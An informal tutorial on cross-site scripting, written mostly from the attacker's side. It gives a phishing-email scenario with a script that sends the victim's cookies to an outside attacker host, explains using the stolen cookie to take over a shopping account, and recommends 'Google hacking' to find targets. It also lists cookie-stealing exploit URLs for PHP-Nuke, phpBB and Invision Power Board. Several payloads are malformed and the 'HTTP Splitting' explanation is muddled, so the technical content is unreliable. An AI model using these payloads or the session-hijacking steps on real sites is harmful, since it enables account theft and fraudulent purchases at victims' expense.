Cross site scripting(XSS) attack exploits bugs in the web application to steal cookies,credit card numbers and other sensitive information.For technically challenged ones , a bug is flaw in coding a program or application.The web application maybe a forum or any other place where the user can input data.
An attacker can also send fraudulent emails impersonating a bank or shopping site,for example,and steal the user's cookies used by original site to authenticate him.A real life scenario is given below.
First of all ,the attacker finds that there is an XSS vulnerability in the web application software that the shopping website uses, he sends the victim and email, with the following HTML:
<A
HREF="http://archives.cnn.com/2001/US/09/16/inv.binladen.denial/?tw=<
script>document.location.replace('http://freewebhost.com/ph33r/steal.cg
i?'+document.cookie);</script>">Check this Article Out! </a>
The user would of course click the link and they would be lead to the CNN News Article, but at the same time the attacker would of been able to also direct the user towards his specially crafted URL, he now has
the users cookie. Using the Firefox cookie editor the attacker copies and pastes the victims cookie and uses it for himself. The attacker now refreshes and page and has access to the victims
account, the victim is billed with everything the attacker chooses to
buy.
To find out the vulnerable sites ,like all script kiddies ,you can extensively use Google,which we call Google hacking.
EXPLOITS AND VULNERABILITIES
PHP NUKE VULNERABILTIES AND EXPLOITS:
http://localhost/nuke73/modules.php?name=News&file=article&sid=1&option
box=['http://freewebhost.comht/ph33r/steal.cgi?'+document.cookie]
The above exploit can exploit a vulnerability in PHP Nuke, because
modules.php fails to sanitize user input, the vendor had bothered to
make sure that input did not contain malicious code, the attack could
not be possible.
PHPBB FORUM VULERABILITIES AND EXPLOITS:
http://localhost.com/phpBB2/login.php('http://freewebhost.com/ph33r/ste
al.cgi?' document.cookie)
The above exploit is for a HTTP Splitting vulnerability in phpBB, HTTP
Splitting is when someone injects there own information into the HTTP
Headers, again if the php software filtered the user input correctly it
would not be allowed to happen, user input should NEVER be trusted.
INVISION POWER BOARD:
http://[target]/index.php?act='><script>alert(document.cookie)</script>
The above is obviously just a proof of concept exploits, all it does is display a message
box. The above exploit is for a vulnerability in IPB that is allowed to
occur because IPB (Version < 2.03) failed to sanitize user input.
After looking at the above vulnerabilities you should be able to summarize that XSS
attacks can occur mainly because a vendor fails to sanitize user input in there program(s).